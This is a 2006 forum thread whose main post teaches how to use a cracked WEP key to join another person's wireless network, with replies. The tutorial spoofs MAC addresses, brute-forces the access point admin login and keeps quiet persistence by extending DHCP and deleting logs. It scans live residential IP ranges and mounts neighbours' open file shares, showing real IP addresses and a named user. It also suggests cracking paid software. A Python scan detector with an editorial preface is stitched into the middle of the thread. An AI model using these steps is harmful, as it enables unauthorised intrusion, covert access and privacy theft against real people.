
 


 Post subject: Tutorial - Cracking WEP with Windows XP part 2
PostPosted: Sun Sep 03, 2006 12:44 am
  

Site Admin

Joined: Sat Feb 11, 2006 10:44 pm
Posts: 6601
Location: UK :-)
Cracking WEP with Windows XP SP2 - Part Two


Part Two in the Cracking WEP series covers what to do once you have a valid WEP key – I recommend you read Part One (if you have not already) before reading this tutorial if you want to understand how WEP works and how to get the WEP key. It can be found here: http://www.tazforum.thetazzone.com/viewtopic.php?t=2069



So, you have managed to get a valid WEP key, and are wondering what to do next?

Well, first of all, you should try to associate with the Wireless Access Point (WAP or AP). This is made very easy in Windows XP SP2:


When SSID Broadcasting is enabled:
Start > Connect to > Wireless Network Connection > View Available Wireless Networks

You will now be presented with a list of wireless networks that Windows XP has managed to find. If SSID broadcasting is enabled on the AP, the network name will show up, and the application will also let you know if the AP is using WPA encryption or not.

If it shows the network name and then 'Security enabled wireless network' beneath it, there is a 90% chance that it will be using WEP for its security. If it is using WPA, it will say "Security Enabled Network (WPA)".

Now just double click on the network name and it will prompt you to enter the WEP key – enter this twice and see if it lets you connect.

If it does, well done, you have successfully associated with the AP – if it does not, the following are the most likely possible causes of this:

- The AP has MAC Address filtering enabled;
- You are too far away from the AP;
- The WEP key is wrong.

The AP has MAC address filtering enabled
If you followed my previous paper to obtain the WEP key, I mentioned writing down the MAC addresses that had successfully associated with the AP in case MAC address filtering was active.

Now you know why!

Change your MAC address (covered later on) to one that you know was associated and therefore authenticated to that AP. Then, wait until it is not in use - the early hours of the morning are usually good for this - change your MAC Address, and try to associate with the AP. You can try it whilst the rightful owner of the MAC is online, but you will either kick him off or be rejected by the AP.

You are too far away from the AP
- Move closer to it;
- Wait until night time – wireless waves travel further at night, especially if it has been raining (the more humid, the better);
- Get an external and more powerful antenna, or a directional antenna (these are much more powerful than omnidirectional antennae);
- Try another wireless card;
- Sometimes moving rooms in your house can solve the issue – I pick up APs in one room in the front of my house that I don’t in a room at the back of my house;
- Move into the garden – there are no walls or electrical interference in the garden!

The WEP key is wrong
This may sound obvious but I have had students do this in the past... Make sure that the WEP key you have managed to obtain is for the same AP to which you are trying to connect!
Check you are entering it in correctly – it is in HEX so the 0 is a ZERO, not a capital ‘O’ – there is no ‘O’ in HEX – I have seen this before too!


If SSID broadcasting is disabled:
If SSID broadcasting is disabled, and if you have not managed to find it with Airodump, you will have to fire Airodump back up and let it collect data again (use your IVS file and just add data to this) until it finds the SSID – it will find it, given enough data. There are other applications that will do this on various operating systems, but I am using Airodump here.

Once you have the ESSID (the name of the wireless network), you need to tell Windows what AP you would like it to connect to. You do this like so:

Start > Connect to > Wireless Network Connection > View Wireless Networks > Change Advanced settings (on the left) > Wireless Networks (Middle tab on top) > Add (under preferred networks) > Type the SSID exactly as Airodump has displayed it to you into the "SSID" box > Network Authentication is usually OPEN > Select WEP from the Data Encryption > Uncheck ‘The Key is provided for me automatically’ box if it is ticked > Then enter the WEP key into the relevant boxes, without the colons.

If you wish, you can go to the last tab (Connection) and check the box to ‘Automatically connect when network is in range’. This will automatically connect you to this network when Windows picks it up; this setting is usually enabled by default.

The other settings will differ by AP but are usually left unchecked.


Changing your MAC address:
For some people, this can seem a bit daunting and/or a complex task to do. This would have been true a few years ago, but nowadays there are hundreds of applications which can do this for you, and with Windows XP SP2 it can even be done using the inbuilt network configuration tools.

First, let me very briefly explain what a Media Access Control (MAC) address is and why it is so important on a network.

All Network Interface Cards (NICs) have a unique set of numbers and letters encoded into the hardware when they are made in the factory. Theoretically, every single NIC in the world has a different MAC address. It is encoded using the HEX numbering system – that is, the decimal digits (numbers from 0-9) and the letters A-F (the same HEX that a WEP key uses).

It will look something like this: 00:09:5B:84:A6:DF

Each manufacturer has a different OUI (Organisationally Unique Identifier) at the beginning of the MAC address, but that is not important to us here.

When you try to associate with an AP, your MAC address is included in the header of the frame (data) that you are sending. The AP will check this against a local database to see if you are allowed to associate with the AP or not. If you are not, obviously you will not be allowed to associate, so you will need to spoof your own MAC address. Be aware that you will cause a duplicate entry in the AP's ARP cache if you try to use the MAC address of a host that is already associated with the AP. It may be wise to wait until a quiet period - usually at night - before doing this.

I don’t want to go into too much detail here about this process, but if you do want to learn more about it and how it can be exploited on a network, you can read other papers that I have written here:
http://tazforum.thetazzone.com/viewtopic.php?t=473
http://tazforum.thetazzone.com/viewtopic.php?t=530

To change a MAC address, I like to use AMAC: http://amac.paqtool.com/

You can download a trial version of it from the link above, and the more resourceful of you will be able to find a crack to unlock the full version of it.

The program is very user-friendly, and there is no need for me to explain how to use it. But, if you do have any issue with changing your MAC address with it, post in this thread and someone will try to help you (DO NOT post asking where to get the crack).

To change your MAC address using Windows' inbuilt tools, you must use the Windows Device Manager (this is not possible on ALL wireless adaptors, especially in-built ones). Here are instructions on how to do this:

Control Panel > System > Hardware > Device manager > Network Adaptors > Select your network adaptor > Advanced > MAC Address / Hardware Address/Locally administered address > Change it to the desired value.

**Make sure you write the original one down so you can change it back**

Or you can do it via the registry:

1. Open up a command prompt and type “ipconfig /all”, write down the Description for the NIC you want to change and also the MAC address you want to change.

2. Open up a command prompt and type “net config rdr”

3. Write down the long number between the curly braces { }. This is the GUID of the NIC – you may have more than one; if so, write them all down or copy and paste them into a text file for reference later on.

4. Start -> Run, type “regedt32”. Do not use Regedit.

5. If you so wish you can back your registry up in case you inadvertently mess it up – the registry is vital to how Windows operates, and incorrectly changing a setting could render your computer unusable.
To back it up, either right click on the root of the key we are editing (in this case, it is HKEY_LOCAL_MACHINE) and select Export – call it something appropriate and save it somewhere (like My Documents). Or, if you want to back up the whole registry, right click on My Computer > Export – this will export the entire registry.

6. Go to “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}”. Double click on the first one to expand the tree. The sub keys are 4-digit numbers, which represent a whole range of different hardware. You should see most of them start with 0000, then 0001, 0002, 0003 and so on.

7. Go through each sub-key that starts with 0000 and check the DriverDesc keyword on the right until you see the NIC you want to change the MAC address on. The DriverDesc will be the same as what your NIC was called in the Device Manager. If you are not sure about the DriverDesc, you can verify it by checking if the NetCfgInstanceID keyword value matches the GUID you wrote down earlier.
If there is no match, then move on to 0001, 0002, 0003, and so on, until you find the one you want. Usually 0000 contains the first NIC you installed on the computer.

8. When you have found and selected the correct sub-key (0000, in my case), check if there is a keyword "NetworkAddress" on the right side of the window.
If the "NetworkAddress" keyword does not exist, we will have to create it, like so:
Click on the drop down menu “Edit -> Add Value”.
In the Add Value window, enter the following value then click OK.
Value Name: = NetworkAddress
Data Type: = REG_SZ
Then the String Editor window will pop up:
Enter the new 12 digit MAC address that we know is allowed to authenticate to the AP > OK.

Close the registry.

To make this MAC address active you need to either disable and then re-enable the NIC or just reboot your system.

So now we have a MAC Address that we know is allowed to associate with the AP, try to re-authenticate.

You should now be able to connect – if not, carry on with the troubleshooting steps mentioned above!

If you’re still unable to authenticate, post in this thread with any error messages and a detailed description of what is going wrong and someone will try to help you out!






I will take it now that you have been able to associate with the AP and are connected OK.

There is no set way to do things from here on, and you can go off and search for a whole range of things you can do to a computer on the same network as you!

But, to get you started, I will give you a few basic ideas and things you can try.


Administratively connect to the AP
Open up a command prompt and type IPCONFIG:

Look under the relevant NIC to find your IP address and your Default Gateway:
Code:
Ethernet adapter Wireless Network Connection:

        Connection-specific DNS Suffix  . : bubbles
        IP Address. . . . . . . . . . . . : 192.168.2.4
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.2.1

The IP Address and Subnet mask tell us what subnet we are on - in the example above, I am on the 192.168.2.0 network and a 255.255.255.0 mask. From this, I can determine that the possible range of IP’s that could be active is 192.168.2.1 – 192.168.2.254.

We already know that 192.168.2.1 is active and what it is – the default gateway. In this case (and probably in yours too), it is also the IP address of the AP!

So we open up our web browser and type 192.168.2.1 into it, which will take us to the admin login page for the AP.
There's a 9/10 chance that the make and model of the AP will be displayed for us here – when we have this, pop along to Google and search for ‘default wireless access point passwords’ which will give you thousands of sites which will list the default passwords for WAP’s (such as this one: http://www.phenoelit.de/dpl/dpl.html). Find the entry for the make and model of the AP and try the login details to see if they work.

If they do not, go and download Brutus and try an HTTP brute force attack against it.

Once we have managed to connect to the AP as an administrator, we can see its whole configuration – look for any port forwarding entries to give you an idea of what services may be running behind the AP. You may also be able to see all the DHCP assignments (IP addresses that the AP has given out to hosts). You can also open ports on the AP, should you wish to. Check its logs. Some AP’s will not allow wireless clients to talk to each other, which will mess up any further testing attempts later on, so you should turn that setting off now. Enter your own, correct MAC address into the MAC address table so that you will be able to connect when other hosts are connected next time. Check the range of IP’s to be issued to hosts – if the owner only has two computers he may only have set two IP addresses to be issued, so extend this by one so that you can connect at the same time as the other two hosts.

I would not change the password once you know it, as this will let the owner know that he has been pwned and will just prompt him to hard reset the router and try harder to secure it. If you launch any attacks from the outside, you can also go in and delete the logs here.



Port Scanning
We know the IP range in use from either the output of the ipconfig command or, if we managed to connect to the AP as an administrator, the current IP setup we could see there, so we can scan the network to see what hosts are active.

I prefer NMAP for this, but any port scanner will do:

To perform a ping sweep with NMAP we use the -sP switch:
Code:
H:\>nmap -sP 192.168.2.0/24

The 192.168.2.0/24 tells NMAP to ping all hosts between 192.168.2.0 – 255, the /24 is an abbreviated way of telling it the subnet mask – 255.255.255.0.

This may return something similar to this:
Code:
Starting Nmap 4.03 ( http://www.insecure.org/nmap ) at 2006-08-28 16:21 GMT Daylight Time
Host 192.168.2.1 appears to be up.
Host 192.168.2.2 appears to be up.
Host 192.168.2.5 appears to be up.
Nmap finished: 256 IP addresses (3 hosts up) scanned in 68.844 seconds

We know what 192.168.2.1 is and now we also know what other hosts are active on the network.

As most of you probably know, you don't connect to an actual 'computer' - you connect to a service that the computer is running. This could be a service that the OS is running, e.g. NetBIOS, or a third-party service, e.g. VNC.

To talk to other computers, most services use ports.

For the most part, a service will use a pre-defined port (by default).

So, if you scan a computer’s ports, you can find out what services are running.

Once you have a list of used ports and services, then research these services to see what they do - if you find one that interests you, research how to exploit this service, so that you can compromise the computer running it.

This is known as port scanning, and the main reason for doing it is to discover what services are running on each host.

**Be careful not to alert anyone on the network with overenthusiastic port scanning. If a host has a firewall active and a message pops up saying ‘Connection attempt from 192.168.2.x port 139’, the owner may be a bit suspicious if the IP is one that should not be in use. Try to use a passive scan such as the -sS switch in NMAP**



NetBIOS
It is possible to connect to a NetBIOS share that the firewall on the AP may have been protecting – here is an extract from a NetBIOS paper I wrote a few months ago: (Note the IP Addresses will have changed since this was written, and will belong to someone else by now!)
Quote:
After you have downloaded Nmap go and get winfo from here:
http://ntsecurity.nu/toolbox/winfo/

When you have this browse to C:\WINDOWS\system32 and drop the winfo file there. Or you can manually edit your path for the command prompt to include the location of the winfo file.


Now we have nmap we want it to scan a range of IP’s but as we are trying to gain access to the NetBIOS shares, we only need to scan ports 139 and 445. So we issue the following command:
Code:
nmap -sS -P0 81.32.12.0-255 -p139,445


Here we have told nmap to conduct a SYN Stealth scan, without pinging the hosts, against the IP range of 81.32.12.0 – 81.32.12.255 only on ports 139 & 445.

Here are the results of the scan:
Code:
Interesting ports on 81.32.12.204:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.205:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 206.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.207:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.208:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 222.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 223.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.224:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.225:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 226.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.227:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.248:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

**OUTPUT TRUNCATED**

Nmap finished: 256 IP addresses (256 hosts up) …..


OK, now looking at the output of the scan, there are three states a port can be in: Closed, Filtered or Open.

Closed speaks for itself, Filtered usually means it is open/active but is protected by a firewall of some kind and Open means it is open and un-protected.

So we trawl through the results and find that 81.32.12.240 has an open port on 139…

So we will go and take a look at it.

Just a side note - we scanned for port 445 too, as it is possible to have port 139 open but not have the file sharing service running - if port 445 is open as well as 139 it usually means that the file sharing service is up and running, and this could save us some time when choosing which host to attack.

Fire up the command prompt again and use the in-built NBTSTAT utility that comes with Windows. The command we give is:
nbtstat -a [ip address]

Like so:
Code:
H:\>nbtstat -a 81.32.12.240

Local Area Connection:
Node IpAddress: [192.168.2.3] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
MASSAMA <00> UNIQUE Registered
MASSAMA <20> UNIQUE Registered
GRUPO_TRABAJO <00> GROUP Registered
GRUPO_TRABAJO <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00



So what is all this telling us?

Well, what we are looking at mainly is the ‘TYPE’ status. We want to see <20> there. A common misconception is that if you can connect to a box in the above mentioned manner, file sharing is enabled. This is not always the case. When we have connected we need to see the <20> there to tell us File Sharing is enabled; if it is not there and you are at a level that means you are reading this – you may as well move on to another box.

The following table lists all the possible entries you can get:
Code:
<computername> 00 U Workstation Service
<computername> 01 U Messenger Service
<.._MSBROWSE_> 01 G Master Browser
<computername> 03 U Messenger Service
<computername> 06 U RAS Server Service
<computername> 1F U NetDDE Service
<computername> 20 U File Server Service
<computername> 21 U RAS Client Service
<computername> 22 U Exchange Interchange
<computername> 23 U Exchange Store
<computername> 24 U Exchange Directory
<computername> 30 U Modem Sharing Server Service
<computername> 31 U Modem Sharing Client Service
<computername> 43 U SMS Client Remote Control
<computername> 44 U SMS Admin Remote Control Tool
<computername> 45 U SMS Client Remote Chat
<computername> 46 U SMS Client Remote Transfer
<computername> 4C U DEC Pathworks TCP/IP Service
<computername> 52 U DEC Pathworks TCP/IP Service
<computername> 87 U Exchange MTA
<computername> 6A U Exchange IMC
<computername> BE U Network Monitor Agent
<computername> BF U Network Monitor Application
<computername> 03 U Messenger Service
<domain> 00 G Domain Name
<domain> 1B U Domain Master Browser
<domain> 1C G Domain Controllers
<domain> 1D U Master Browser
<domain> 1E G Browser Service Elections
<INet~Services> 1C G Internet Information Server
<IS~computername> 00 U Internet Information Server


As you can see there are many different services that we can connect to. The scope of this paper is File Sharing though, so we will just concentrate on the <20> field.

So, after discovering we can ‘nbtstat’ to another box and we have established that the File Sharing Service is running we want to see what shares are available on a box.

For this we again use an inbuilt command in Windows. The ‘net’ command. Or more specifically the ‘net view’ command.

Code:
H:\>net view \\81.32.12.240
System error 5 has occurred.

Access is denied.


Woops. Ok, so this guy is not as open as he first appeared and we can't get a list of his shares. This may be because he is not running any shares or because he has locked down his box and prevented it from displaying his shares to the casual internet user.

I have put this in to this paper for a few reasons. The first being, if you scour the internet looking for NetBIOS tutorials, you will find hundreds that have been written and performed on an internal LAN, which is conveniently set up to allow anonymous access to the File Sharing service. This paper is using live IP addresses in real life scenarios on the real internet – not a pre-constructed LAN. If you don’t agree with using a real IP scenario – this paper is not for you and you should stop reading it now.

Another reason I left it in is to show that just because you can see the NetBIOS table and it has the <20> File Sharing service running, does not mean you can connect to it!

The final reason is to demonstrate that you will not always be successful with this attack and it can take a lot of trial and error. I have given lessons in the past that have gone on for in excess of 60 minutes before we have found an open and suitable host.

There are ways to gain access to secured shares but that is in the scope of the Advanced NetBIOS paper which will follow this one.

Right, so the last command would not let us get a list of the shares available…..but that does not mean there aren’t any. We can try to connect to the most obvious ones anyway and see what happens.

We stick with the inbuilt ‘net’ command only this time we use the ‘net use’ command.
Code:
H:\>net use \\81.32.12.240\ipc$
The password is invalid for \\81.32.12.240\ipc$.

Enter the user name for '81.32.12.240': administrator
Enter the password for 81.32.12.240:
System error 1326 has occurred.

Logon failure: unknown user name or bad password.


OK we don’t know the password…..there are heaps of password crackers for NetBIOS out there – which I consider to be more advanced so will be included in the next paper.

We do have the option of connecting via a ‘null’ session however. A null session does not require a user name or password and will usually allow a connection attempt.
To signify a null connection attempt we use the "" /U:"" switch at the end of our command.

Try the following:
Code:
H:\>net use \\81.32.12.240\ipc$ "" /U:""
The command completed successfully.


Now try the ‘net view’ command again to see if we can get a list of the shares. This may or may not be successful, but more often than not it will fail. (If you are successful, read on further down the page to find what to do next!)

Right, so for the scope of our paper the above target will be considered ‘secure’ and we move on to easier pickings……..back to nmap!

I find it easier to either use the -oN switch or to right click the top of the command prompt window and go to properties. Once here, increase the buffer size to enable you to scroll upwards in the command prompt – otherwise you may not be able to view the entire output.

The best results for this type of crack are usually found in a residential subnet of IP addresses. How do you find one of those? If you’re at home chances are you are in a residential subnet! Take a look at your own IP and use that. When I ran this scan my IP was in the 86.132.223.x range so I scanned that.
Code:
nmap -sS -P0 -v 86.132.223.0-255 -p 139,445


The results for open ports came back as:
Code:
Discovered open port 139/tcp on 86.132.223.96
Discovered open port 139/tcp on 86.132.223.124
Discovered open port 139/tcp on 86.132.223.178
Discovered open port 139/tcp on 86.132.223.227



OK, so now we have a whole host of my neighbours to connect to!

Let's choose an IP!

Hmmmmmm 86.132.223.178 I think!

So open up a command prompt and type:
Code:
H:\>nbtstat -a 86.132.223.178

Local Area Connection:
Node IpAddress: [0.0.0.0] Scope Id: []

Host not found.

Wireless Network Connection 3:
Node IpAddress: [192.168.2.6] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
OFFICE <00> UNIQUE Registered
MSHOME <00> GROUP Registered
OFFICE <20> UNIQUE Registered
MSHOME <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00



Ok so we now have the NetBIOS table and the MAC address. We take a look to see if the File Sharing Service is active (<20>). Yep it is.

So, now as we know, we issue the net view command to get a list of the shares….

Code:
H:\>net view 86.132.223.178
Shared resources at 86.132.223.178

OFFICE

Share name Type Used as Comment

-------------------------------------------------------------------------------
bramford photos Disk
BrotherD Print Brother DCP-340CW USB Printer
BrotherD.2 Print BRN_759F2E
johns Disk
PaperPor Print PaperPort Black & White Image
PaperPor.2 Print PaperPort Color Image
Printer Print Imprimante Fax Olitec
Printer4 Print ProgeSOFT PDF Wizard
Printer7 Print Net-It Now! SE for Pressworks
Printer9 Print EPSON PictureMate
SharedDocs Disk
SLAVE (D) Disk
The command completed successfully.



Look at all those shares.

Now open up a new command prompt and give the following command:
Code:
H:\>winfo 86.132.223.178 -v

Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/


SYSTEM INFORMATION:

- OS version: 5.1

DOMAIN INFORMATION:

- Primary domain (legacy): MSHOME
- Account domain: OFFICE
- Primary domain: MSHOME
- DNS name for primary domain:
- Forest DNS name for primary domain:

PASSWORD POLICY:

Warning: Unable to retrieve password policy.
Reason : Access denied.

LOCOUT POLICY:

Warning: Unable to retrieve lockout policy.
Reason : Access denied.

SESSIONS:

Warning: Unable to retrieve sessions.
Reason : Access denied.

LOGGED IN USERS:

* OFFICE$

* vernon cooper

USER ACCOUNTS:

Warning: Unable to enumerate users.
Reason : Access denied.

WORKSTATION TRUST ACCOUNTS:

Warning: Unable to enumerate workstation trust accounts.
Reason : Access denied.

INTERDOMAIN TRUST ACCOUNTS:

Warning: Unable to enumerate interdomain trust accounts.
Reason : Access denied.

SERVER TRUST ACCOUNTS:

Warning: Unable to enumerate server trust accounts.
Reason : Access denied.

SHARES:

* IPC$

- Type: Unknown
- Remark: Remote IPC

* print$

- Type: Disk drive
- Remark: Printer Drivers

* SharedDocs

- Type: Disk drive
- Remark:

* johns

- Type: Disk drive
- Remark:

* PaperPor.2

- Type: Print queue
- Remark: PaperPort Color Image

* Printer7

- Type: Print queue
- Remark: Net-It Now! SE for Pressworks

* SLAVE (D)

- Type: Disk drive
- Remark:

* Printer4

- Type: Print queue
- Remark: ProgeSOFT PDF Wizard

* PaperPor

- Type: Print queue
- Remark: PaperPort Black & White Image

* BrotherD.2

- Type: Print queue
- Remark: BRN_759F2E

* bramford photos

- Type: Disk drive
- Remark:

* Printer9

- Type: Print queue
- Remark: EPSON PictureMate

* Printer

- Type: Print queue
- Remark: Imprimante Fax Olitec

* BrotherD

- Type: Print queue
- Remark: Brother DCP-340CW USB Printer



As you can see winfo gives us all the shares in an easier to read layout. You can put –n at the end of the winfo command to establish a null session if issuing the command without it does not work.

Ok let’s pick a share….mmmm…johns looks good.

Let me explain the following command briefly first though.

"Net use" – means we are going to use a network resource.
The "*" means use the next available drive letter. We normally have C for the hard drive, D for the next logical partition or next hard drive, E for a CD-ROM and maybe even F for another CD-ROM/DVD-ROM etc. Using the * just tells Windows to use the next available letter, starting from Z and working backwards. We can specify our own letter if we want to, but the outcome is the same.
Code:
H:\>net use * \\86.132.223.178\johns
Drive Z: is now connected to \\86.132.223.178\johns.

The command completed successfully.


Ok, so John has a share on this computer that is open to the whole world and is not password protected.

How do we see what information is available to us?

Simply go to ‘My Computer’ and you will have a Z drive there already connected and mapped out for you! Click on it and you get to see what is in John's share.

Let’s try another Share:
Code:
H:\>net use * \\86.132.223.178\SharedDocs
Drive Y: is now connected to \\86.132.223.178\SharedDocs.

The command completed successfully.


So go back to My Computer and you will now see the Y: drive connected and mapped out for you.

The other and easier way to do this, is to now go to Start > Search > Computers and add the IP Address in. You will now get a nice graphical view of all the shares.

There are many things that you can do now - some will work, most will not. It is all about research to see what your options are.



To reiterate:
- Find the IP range in use;
- Find the default gateway, which will usually be the IP of the AP;
- Try to connect to the AP’s admin page by typing the IP into a web browser;
- Ping sweep the IP range to see what hosts are up;
- Port scan each individual host to see what services are running;
- Research the active services – what they are, how they work, etc;
- Research how to exploit a service that looks "interesting";
- Do NOT make any changes that the AP’s owner will notice, such as changing the password, unnecessarily deleting the AP’s logs, etc.



The intent of this paper was to show you how to authenticate to an AP that has SSID broadcasting either enabled or disabled and how to connect to one that has MAC address filtering enabled, and also to give you a few basic tips and a push in the right direction to show you the kind of things you can do when you have managed to connect.
There are thousands of possible services that can be running on the hosts behind an AP – some with easy to exploit flaws, some with flaws that are harder to exploit and some with no flaws at all – but these services are the key to connecting to ANY computer; if there are no services running, you can’t connect to the host.

You need to read up on any services you find running and see if they can be exploited – I gave you a common example with the NetBIOS service to show you the type of things you are able to do when you have identified a service. Now you need to identify a service or two that interest you and read up on them.

Any questions about this can be posted in this thread. Alternatively, feel free to start a thread of your own (in the relevant forum) to ask your question.

Please DO NOT email or PM me to ask me any questions personally, as I will not reply to them.

Thanks

Nokia

//If you have a web site and would like to link to this or replicate it on your site then you may do so as long as you link back to here with the proper credit. Please do not do as some lame skiddie called Krozo did on what has to be the worst forum I have ever seen here with Part One: not only did he try to pass it off as his own, but he also thanked ME for helping HIM write it!




_________________
Drugs have taught an entire generation of kids the metric system..

TAZ's better half: http://www.theadminzone.com/


Last edited by Harry on Sun Sep 10, 2006 10:45 pm, edited 1 time in total.

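The recap above ends with a ping sweep of the range and a port scan of each host. Seen from the AP owner's side, those steps leave a footprint in the gateway's connection log, and the Python detector below shows how to pick them out: a source that touches many distinct hosts with ICMP, or many distinct ports on one host, gets flagged. This is an added example and not part of Nokia's tutorial; the log format, the thresholds and the sample lines are constructed assumptions for the example.

```python
"""Flag ping sweeps and port scans in gateway/firewall connection-log lines.

Added example: not code from the tutorial. The log format is an assumption,
one record per line: "<hh:mm:ss> <ICMP|TCP|UDP> <src_ip> -> <dst_ip>:<port>"
with "-" as the port for ICMP.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2})\s+(?P<proto>ICMP|TCP|UDP)\s+"
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3})\s+->\s+"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+|-)$"
)

# Thresholds are example values; tune them for the size of your own network.
SWEEP_HOSTS = 8   # one source pinging this many distinct hosts looks like a sweep
SCAN_PORTS = 10   # one source hitting this many distinct ports on one host looks like a scan


def parse_line(line):
    """Return a dict for a well-formed record, or None for a line that does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def detect(lines, sweep_hosts=SWEEP_HOSTS, scan_ports=SCAN_PORTS):
    """Return {"sweeps": {src: n_hosts}, "scans": {(src, dst): n_ports}}."""
    icmp_targets = defaultdict(set)   # src -> set of hosts it sent ICMP to
    port_targets = defaultdict(set)   # (src, dst) -> set of TCP/UDP ports touched
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["proto"] == "ICMP":
            icmp_targets[rec["src"]].add(rec["dst"])
        elif rec["port"] != "-":
            port_targets[(rec["src"], rec["dst"])].add(int(rec["port"]))
    sweeps = {s: len(h) for s, h in icmp_targets.items() if len(h) >= sweep_hosts}
    scans = {k: len(p) for k, p in port_targets.items() if len(p) >= scan_ports}
    return {"sweeps": sweeps, "scans": scans}


# Constructed sample: 192.168.1.104 pings ten hosts, then probes twelve ports on
# .102; 192.168.1.50 is an ordinary client talking to one web server.
SAMPLE_LOG = (
    [f"10:00:{i:02d} ICMP 192.168.1.104 -> 192.168.1.{100 + i}:-" for i in range(10)]
    + [f"10:01:{i:02d} TCP 192.168.1.104 -> 192.168.1.102:{p}"
       for i, p in enumerate([21, 22, 23, 25, 80, 110, 135, 139, 443, 445, 3389, 8080])]
    + ["10:02:00 TCP 192.168.1.50 -> 192.168.1.1:80",
       "10:02:01 TCP 192.168.1.50 -> 192.168.1.1:443",
       "garbage line that should be ignored"]
)

if __name__ == "__main__":
    for kind, hits in detect(SAMPLE_LOG).items():
        for key, count in hits.items():
            print(f"{kind}: {key} ({count})")
```

Feed it the real log format by adjusting LINE_RE; the counting logic does not depend on the exact layout, only on source, destination, protocol and port.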
 
PostPosted: Sun Sep 03, 2006 12:53 am
THE Prancing Pirate
Joined: Fri Feb 24, 2006 10:47 pm
Posts: 8167
Great tut, Nokia! Really great job, mate ;)

This should aid many a newbie :P Hehe!


[edit] So good, in fact, that I've submitted it to Digg: http://digg.com/security/Cracking_WEP_w ... 2_Part_Two :D

_________________
"Don't gain the world and lose your soul, wisdom is better than silver or gold." - Bob Marley

[CS:Source Admin]


PostPosted: Sun Sep 03, 2006 12:58 am
Site Admin
Joined: Sat Feb 11, 2006 10:44 pm
Posts: 6601
Location: UK :-)
:D

 
PostPosted: Mon Sep 04, 2006 6:55 am
Just beginning to get the hang of it
Joined: Sat Aug 26, 2006 3:04 am
Posts: 15
excellent tut again, nokia.

I am a little confused about something, though (actually quite a bit but this is the first thing that popped up)

When you finally connect to this vulnerable IP within your residential subnet, you seem to be using wireless to connect to his open TCP port (correct?). Is this because it is impossible to connect over wired? I suppose it is because only your wireless card is cleared to associate with the AP, but is it possible to add your wired network card's MAC address to the router to make it think you are on the LAN?

Also, since you are connecting to this host using wireless, this guy must physically be pretty close to you? I would think the range of hosts within your residential subnet would tend to mostly be out of wireless range. Perhaps I am not understanding this concept completely...are you connecting to this host by talking to his router, which is in turn relaying you to him? Or are you directly talking to him and bypassing the router completely?


PostPosted: Mon Sep 04, 2006 7:17 am
Going out is soo last millenium
Joined: Thu Aug 31, 2006 4:42 pm
Posts: 201
Location: The bastard demon poster
Some router configurations still make an IP range, or in the most chaotic of cases a MAC range, accept clients from elsewhere, bypassing the WEP key identification.

When you configure your card to join the router's clients, in the most chaotic of cases you need to spoof a connected client's MAC, duplicating your MAC address with the "victim" test client.

On Linux it is very easy to change the MAC:

ifconfig <interface> down
ifconfig <interface> hw <class> <address>
ifconfig <interface> up

An example:

ifconfig eth0 down
ifconfig eth0 hw ether 7A:5F:04:01:5B:E5
ifconfig eth0 up

For BSD you can use this recommended class: http://www.crackenfind.info/sea.c


For Windows I recommend reading the Irongeek tutorial at:

http://www.irongeek.com/i.php?page=security/changemac


If you need to perform that on Windows using a "MAC changer" program, you can use my own:

http://www.crackenfind.info/mac.rar



greetz

_________________
Against AV falsehood industry, i have a proposal:

[NuKE] Asylum, Free Antivirus Project (coding, berserker mode)


PostPosted: Mon Sep 04, 2006 7:18 pm
Just beginning to get the hang of it
Joined: Sat Aug 26, 2006 3:04 am
Posts: 15
Tried downloading Brutus... but Norton detected it as a "hacktool" and promptly deleted it upon extraction, so I just wanted to verify that this program is actually safe, seeing as none of the other tools I've downloaded thus far have alerted Norton.


PostPosted: Mon Sep 04, 2006 7:28 pm
Site Admin
Joined: Sat Feb 11, 2006 10:44 pm
Posts: 6601
Location: UK :-)
I can't vouch for the actual download as I don't know where you are downloading it from, but the program itself is safe to use. If you download it from Hoobie you should be OK - it is just a password cracker - Norton has a habit of picking up things like that as unsafe applications - it used to detect Nmap as a virus at one point! :roll:

This is a safe place to download it:
http://www.hoobie.net/brutus/brutus-download.html



Last edited by Harry on Tue Sep 05, 2006 5:06 pm, edited 1 time in total.

PostPosted: Mon Sep 04, 2006 8:00 pm
Just beginning to get the hang of it
Joined: Sat Aug 26, 2006 3:04 am
Posts: 15
